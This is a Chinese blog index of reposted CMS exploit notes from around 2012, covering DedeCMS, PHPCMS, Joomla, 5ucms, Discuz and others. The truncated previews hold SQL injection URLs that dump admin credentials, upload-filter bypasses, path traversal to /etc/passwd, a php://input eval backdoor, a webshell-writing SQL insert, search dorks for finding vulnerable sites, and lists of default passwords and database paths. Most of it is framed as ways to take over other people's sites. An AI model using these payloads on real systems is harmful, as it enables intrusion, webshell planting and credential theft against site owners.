CMS
fengling132
这个作者很懒,什么都没留下…
展开
-
织梦cms v6.7最新上传漏洞
file:newname:提交1,必须登陆用户。2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。3,newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。转载 2012-07-02 15:15:57 · 788 阅读 · 0 评论 -
5ucms 最新版 sql 注入漏洞
漏洞EXP↓ /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。转载 2012-07-02 15:21:15 · 698 阅读 · 0 评论 -
74CMS 人才系统 v3.2 注射 & 全版本通杀进后台
因为某站用的这个系统 旁站也无从下手 所以就下了份源码来读整套程序过滤的还是比较全面的 不过所有版本都是GBK编码是他的硬伤 但是基本上字符串入库的时候作者都使用了iconv来把提交过来的数据编码转换成utf8所以利用宽字符注入就没办法了 但是过滤完善仅限3.2版本之前 最新的3.2版本plus目录多了几个文件 不知道是不是换了程序员了… 先上两个白痴注入吧~注转载 2012-07-03 15:34:33 · 2415 阅读 · 0 评论 -
PHPcmsV9任意文件读取漏洞拿Shell
编辑:madman 日期:2012-07-29 分类:技术文章, 最新漏洞 评论:9条评论简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解转载 2012-08-02 21:57:53 · 1515 阅读 · 0 评论 -
phpcms V9最新漏洞利用工具
工具作者:B0y疯子博客《http://Madman.in》工具下载:工具下载地址利用方法:先打开 1.bat然后 把输入命令 php9 madman.in 回车键 谷歌关键字:Powered by PHPCMS v9 © 2012转载 2012-07-25 17:50:34 · 4561 阅读 · 0 评论 -
joomla CMS后台另类拿WebShell方法
漏洞概要关注数(0) 关注此漏洞缺陷编号: WooYun-2011-02640漏洞标题: joomla CMS后台另类拿WebShell方法相关厂商: joomla CMS漏洞作者: akacd提交时间: 2011-08-07公开时间: 2011-08-07漏洞类型: 命令执行危害等级: 中自评Rank: 7转载 2012-08-15 16:47:03 · 2786 阅读 · 0 评论 -
批量拿joomla的webshell
本次批量拿的webshell都是php的,而且大都是linux服务器搭建的,大家不要去搞破坏!首先,Google:核心是 Joomla!. 有效 XHTML 和 CSS. 打开网址,加上后缀:index.php?option=com_user&view=reset&layout=confirm来到确认用户页面,提示你要输入暗号,我们输入单引号 ' ,点击发送,转载 2012-08-15 16:48:42 · 3419 阅读 · 0 评论 -
Joomla远程上传漏洞 可直接getshell
作者:1337 1. 有些joomal需要先注册. http://site/index.php?option=com_user&view=login 2. 到上传地址 http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en 3.转载 2012-08-15 16:39:52 · 2692 阅读 · 0 评论 -
SpeedCMS任意文件下载读取漏洞
作者:90sex90sec《www.90sec.org》163微论坛《www.admin163.net》关键字:inurl:article/file/cidhttp://admin163.net/article/file/cid/ ... ../../../etc/passwd数据库下载地址:?file=../../../..转载 2012-08-31 17:28:18 · 1541 阅读 · 0 评论 -
DeDeCMS v5.7最新利用工具[一键暴密码]0day
使用说明:1、输入被检测网站的地址2、请等待,时间取决于你的网络状况,和网站的速度。3、如果网站没有漏洞的话会弹出提示。4、成功的话会弹出一个窗口复制密码去破解就好了。下载地址:DeDeCMS转载 2012-07-02 15:05:16 · 4836 阅读 · 0 评论 -
南方数据编辑器southidceditor最新注入0day漏洞
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7直接暴管理员帐号密码(md5)2.登陆后台3.利用编辑器上传:访问转载 2012-06-30 15:34:05 · 6125 阅读 · 0 评论 -
dedecms 5.7 一句话后门利用 exp
http://www.wooyun.org/bug.php?action=view&id=5416shopcar.class.php 被植入一句话@eval(file_get_contents('php://input'));去官网下了一套回来,看了下代码,class MemberShops{ var $OrdersId; var $productsId;转载 2012-04-22 16:43:31 · 1608 阅读 · 0 评论 -
分享一个判断dedecms版本的方法
访问/data/admin/ver.txt附加历史更新:20100708是最新版本5.620100324是5.520100429之后都是5.6版本,对应的日期为补丁的日期,可以知道什么漏洞没补5.6版本更新记录:2010-07-081.修复头像跨目录删除的bug2.UTF-8版本支付错误;2010-06-231.修复会员中心收藏夹错误转载 2012-04-22 16:47:39 · 617 阅读 · 0 评论 -
DEDECMS拿SHELL EXP
转自:t00ls网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell _1 U- t( B- F8 c前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\转载 2012-05-02 15:23:45 · 551 阅读 · 0 评论 -
DEDECMS拿SHELL EXP
转自:t00ls网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell _1 U- t( B- F8 c前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'转载 2012-04-20 22:00:16 · 857 阅读 · 0 评论 -
织梦5.7注入加上传漏洞
会员中心查询会员信息语句过滤不严,导致url可提交注入参数;会员中心有上传动作过滤不严,导致上传漏洞详细说明:①注入漏洞。这站 http://www.webshell.cc/首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membe转载 2012-05-09 13:50:40 · 1144 阅读 · 0 评论 -
phpcms2008企业黄页模块参数未过滤致SQL注射漏洞
phpcms 企业黄页模块由于参数未过滤存在SQL注射漏洞,允许攻击者执行SQL语句.0day是幌子,鸡肋是真的,由于影响比较小,不会造成什么危害,N久之前发现的鸡肋,发出来给博客滥竽充数啦. 今天早上还发现别的程序的漏洞,话说以后要找某程序的漏洞,最快的办法就是审计他们最新的补丁. 如有转载本站原创文章的,还请保留作者及原文链接. 直接上图吧.http://www.x转载 2012-05-10 14:44:37 · 500 阅读 · 0 评论 -
actcms网站管理系统漏洞0day
漏洞版本:actcms3.0以下版本默认后台路径:admin/默认数据库:App_Data/DataBase.mdb默认账户:admin默认密码: admin利用点:FCK编译器漏洞界面:admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmi转载 2012-06-05 12:11:33 · 2384 阅读 · 0 评论 -
动易的默认数据库、用户和密码、认证码大全还有找后台方法
adminadmin888'or'='or'8888200720082006SiteManageCode8888/SiteManageCodedatabase/SiteWeaver6.5.mdbdatabase/SiteWeaver.mdbPowerEasy2006PowerEasy2007PowerEasy2008database/PowerE转载 2012-06-17 22:34:06 · 15175 阅读 · 0 评论 -
默认数据库地址大全
/database/article.asp 贫龙文章管理系统/data/dvbbs7.mdb 动网论坛数据库 7.X/databackup/dvbbs7.mdb 动网论坛默认备份数据库 7.0-7.1/data/dvbbs8.mdb 动网论坛数据库 8.0/admin/data/qcdn_news.mdb 青创文章管理系统数据库/data/转载 2012-06-17 22:34:47 · 1701 阅读 · 0 评论 -
DZ x2.5 爆路径漏洞
测试exp: http://localhost/uc_server/control/admin/db.php http://localhost/source/plugin/myrepeats/table/table_myrepeats.php http://localhost/install/include/install_lang.php转载 2012-08-23 13:35:56 · 854 阅读 · 0 评论